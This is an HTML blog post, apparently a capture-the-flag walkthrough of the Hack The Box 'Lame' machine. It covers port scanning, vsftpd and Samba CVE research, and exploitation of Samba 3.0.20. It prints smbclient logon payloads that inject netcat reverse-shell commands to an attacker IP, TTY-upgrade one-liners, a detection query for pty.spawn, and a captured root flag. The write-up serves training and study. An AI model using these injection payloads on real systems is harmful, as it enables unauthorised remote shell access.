<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>HTB_Lame | HackThe4O4</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="LameNmap &amp; smbclient first we need to know what the Machines open service  IP 10.129.108.1  OS Parrot  nmap -sV -Pn -A -sC 10.129.108.1  nmap -p 1-65535 -T4 -A -v 10.129.108.1        Now we can se">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB_Lame">
<meta property="og:url" content="https://no-flag.com/2024/12/21/Lame/index.html">
<meta property="og:site_name" content="HackThe4O4">
<meta property="og:description" content="LameNmap &amp; smbclient first we need to know what the Machines open service  IP 10.129.108.1  OS Parrot  nmap -sV -Pn -A -sC 10.129.108.1  nmap -p 1-65535 -T4 -A -v 10.129.108.1        Now we can se">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_1.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_2.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_3.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_4.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_5.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_6.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_7.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_8.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_9.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_10.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_11.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_12.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_13.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_14.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_15.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_16.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_17.png">
<meta property="og:image" content="https://no-flag.com/img/lame_Untitled_18.png">
<meta property="article:published_time" content="2024-12-21T12:32:07.086Z">
<meta property="article:modified_time" content="2024-03-02T09:31:16.866Z">
<meta property="article:author" content="Noflag">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://no-flag.com/img/lame_Untitled.png">
  
    <link rel="alternative" href="/atom.xml" title="HackThe4O4" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/cat.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  


<meta name="generator" content="Hexo 7.3.0"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="/img/mela.gif" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/2024/12/21/hello-world/">About Me</a></li>
				        
							<li><a href="/archives">All articles</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
					</nav>
				</section>
				
				
				
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="/img/mela.gif" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/2024/12/21/hello-world/">About Me</a></li>
		        
					<li><a href="/archives">All articles</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="Lame-Lame" class="article article-type-Lame" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2024/12/21/Lame/" class="article-date">
  	<time datetime="2024-12-21T12:32:07.086Z" itemprop="datePublished">2024-12-21</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      HTB_Lame
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="Lame"><a href="#Lame" class="headerlink" title="Lame"></a>Lame</h1><p><a target="_blank" rel="noopener" href="https://hackmd.io/@SY-T/rkVBbdxa6">Nmap &amp; smbclient</a></p>
<p>first we need to know what the Machines open service</p>
<ul>
<li><p>IP 10.129.108.1</p>
</li>
<li><p>OS Parrot</p>
</li>
<li><p>nmap -sV -Pn -A -sC 10.129.108.1</p>
</li>
<li><p>nmap -p 1-65535 -T4 -A -v 10.129.108.1</p>
</li>
</ul>
<p><img src="/img/lame_Untitled.png" alt="Untitled"></p>
<p><img src="/img/lame_Untitled_1.png" alt="Untitled"></p>
<p><img src="/img/lame_Untitled_2.png" alt="Untitled"></p>
<p><img src="/img/lame_Untitled_3.png" alt="Untitled"></p>
<p><img src="/img/lame_Untitled_4.png" alt="Untitled"></p>
<p>Now we can see the open port is:</p>
<ul>
<li>21&#x2F;tcp vsftpd 2.3.4 ftp service</li>
<li>22&#x2F;tcp Openssh 4.7p1 Debian 8ubuntu1 (protocol 2.0) SSH</li>
<li>445&#x2F;tcp Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)  netbios-ssn</li>
</ul>
<p>One of the FTP services allows guests to login</p>
<p><img src="/img/lame_Untitled_5.png" alt="Untitled"></p>
<p>So I try using anonymous login FTP service，but the content is empty</p>
<p><img src="/img/lame_Untitled_6.png" alt="Untitled"></p>
<p>Then I decided to look for vulnerabilities in this service version</p>
<p><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/49757">Offensive Security’s Exploit Database Archive</a></p>
<p>The exploit-db  platform has seen this version of the vulnerability message </p>
<p>And the vulnerability is <code>CVE-2011-2523</code></p>
<p>But I find some problem, this CVE cannot be used here, becouse I use the more exploit to try this CVE, So I guess “this topic” should not apply to this vulnerability</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://vulners.com/nmap/NMAP:FTP-VSFTPD-BACKDOOR.NSE">https://vulners.com/nmap/NMAP:FTP-VSFTPD-BACKDOOR.NSE</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/nobodyatall648/CVE-2011-2523">https://github.com/nobodyatall648/CVE-2011-2523</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/0xSojalSec/-CVE-2011-2523">https://github.com/0xSojalSec/-CVE-2011-2523</a></li>
</ul>
<p>Back to what I said earlier, in addition to FTP services, there are also SSH and SMB services</p>
<p><a target="_blank" rel="noopener" href="https://www.cvedetails.com/vulnerability-list/vendor_id-97/product_id-585/version_id-430455/Openbsd-Openssh-4.7p1.html">Openbsd Openssh version 4.7p1 : Security vulnerabilities</a></p>
<p>After searching for vulnerabilities in this version of SSH, I found no exploitable vulnerabilities, so I directly tested the SMB service</p>
<p>The SMB service has two ports opened</p>
<p><img src="/img/lame_Untitled_7.png" alt="Untitled"></p>
<p>When I browsed the exploit-db platform again, I found a lot of exploitable vulnerability information after looking for the Samba service. Among them, the 445 port targeted the vulnerability of smbd 3.0.20, and I also saw this vulnerability exploit information in the platform list.</p>
<p><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/16320">Offensive Security’s Exploit Database Archive</a></p>
<p><img src="/img/lame_Untitled_8.png" alt="Untitled"></p>
<p><img src="/img/lame_Untitled_9.png" alt="Untitled"></p>
<p>You can see that the CVE number is 2007-2447</p>
<p><a target="_blank" rel="noopener" href="https://www.samba.org/samba/security/CVE-2007-2447.html">Samba - Security Announcement Archive</a></p>
<p>The exploit needs to import the suite first from smb.SMBConnection import SMBConnection</p>
<p>So you have to download the smb for python3 first. If you use the pysmb tool, it will always report an error (for online HTB machines)</p>
<ul>
<li>sudo apt install python3-smb</li>
</ul>
<p>Because the During the OSCP exam  we can’t use MSF tool to help us complete the topic</p>
<p>Use the exploit is the good choose, but this doesn’t work for me</p>
<p><a target="_blank" rel="noopener" href="https://github.com/amriunix/CVE-2007-2447">https://github.com/amriunix/CVE-2007-2447</a></p>
<p>So I decided not to test this way</p>
<p>(Here I changed the IP)</p>
<p>first I want to know the smb service if I use Anonymous identity to login the SMB it can be access?</p>
<p><img src="/img/lame_Untitled_10.png" alt="Untitled"></p>
<p>as i guessed</p>
<p>The smb exploit</p>
<ul>
<li>logon “&#x2F;&#x3D;<code>nc ‘tun0 interface IP’ 4444 -e /bin/bash</code>”</li>
</ul>
<p><img src="/img/lame_Untitled_11.png" alt="Untitled"></p>
<p><img src="/img/lame_Untitled_12.png" alt="Untitled"></p>
<p>I think this method is Failed</p>
<p>So want to try other payload</p>
<p><a target="_blank" rel="noopener" href="https://oscp.infosecsanyam.in/untitled/smb-enumeration">SMB Enumeration</a></p>
<ul>
<li><p>logon “.&#x2F;&#x3D;<code>nohup nc -e /bin/sh LHOST LPORT</code>“</p>
<p>  <img src="/img/lame_Untitled_13.png" alt="Untitled"></p>
</li>
</ul>
<p>when I use this payload, the nc well return the <strong>connect to [10.10.14.9] from (UNKNOWN) [10.129.109.152] 39109</strong> message to me</p>
<p><img src="/img/lame_Untitled_14.png" alt="Untitled"></p>
<p>So I decide to try some command under nc</p>
<p><img src="/img/lame_Untitled_15.png" alt="Untitled"></p>
<p>In order to be fully interactive in this simple reverse shell environment, I use the interactive terminal generated by Python</p>
<ul>
<li><p>TTY</p>
<p>  There a command exists called <strong>tty</strong> which displays information related to <strong>terminal</strong>. The <strong>tty</strong>  command of terminal basically prints the file name of the terminal connected to standard input. <strong>tty</strong> is short of teletype, but popularly known as a terminal it allows you to interact with the system by passing on the data (you input) to the system, and displaying the output produced by the system.</p>
<p>  <a target="_blank" rel="noopener" href="https://ppfocus.com/0/teae6b945.html">Spawning A TTY Shell-逃逸 Linux 各種 Shell 來執行命令 - 人人焦點</a></p>
</li>
</ul>
<p>Attackers may upgrade a simple reverse shell to a fully interactive <code>tty</code> after obtaining initial access to a host.</p>
<p><strong>Spawning a TTY Shell</strong></p>
<ul>
<li>python -c ‘import pty; pty.spawn(“&#x2F;bin&#x2F;sh”)’</li>
<li>echo os.system(‘&#x2F;bin&#x2F;bash’)</li>
<li>&#x2F;bin&#x2F;sh -i</li>
<li>perl —e ‘exec “&#x2F;bin&#x2F;sh”;’</li>
<li>perl: exec “&#x2F;bin&#x2F;sh”;</li>
<li>ruby: exec “&#x2F;bin&#x2F;sh”</li>
<li>lua: os.execute(‘&#x2F;bin&#x2F;sh’)</li>
<li>exec “&#x2F;bin&#x2F;sh”</li>
</ul>
<p><img src="/img/lame_Untitled_16.png" alt="Untitled"></p>
<h3 id="Rule-query"><a href="#Rule-query" class="headerlink" title="Rule query"></a>Rule query</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">event.action:executed and process.name:python and</span><br><span class="line">process.args:(&quot;import pty; pty.spawn(\&quot;/bin/sh\&quot;)&quot; or &quot;import pty;</span><br><span class="line">pty.spawn(\&quot;/bin/dash\&quot;)&quot; or &quot;import pty; pty.spawn(\&quot;/bin/bash\&quot;)&quot;)</span><br></pre></td></tr></table></figure>

<p>when I execution python -c ‘import pty; pty.spawn(“&#x2F;bin&#x2F;sh”)’ </p>
<p>I well got the fully interactive, it let me easy to operate</p>
<p><img src="/img/lame_Untitled_17.png" alt="Untitled"></p>
<ul>
<li>cat &#x2F;root&#x2F;root.txt ⇒ ffed091dd44f75f11cb90d85bb1ca752</li>
</ul>
<p><img src="/img/lame_Untitled_18.png" alt="Untitled"></p>
<p>To be honest, I searched for flag’s file for a long time, because it doesn’t have a fixed file name and location.</p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/12/21/metactf/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          METACTF
        
      </div>
    </a>
  
  
    <a href="/2024/12/21/Machine_Learning_for_Security%20in_Vehicular_Net_wor/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Machine Learning for Security in Vehicular Networks A Comprehensive Survey</div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2025 Noflag
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/smackgg/hexo-theme-smackdown" target="_blank">Smackdown</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>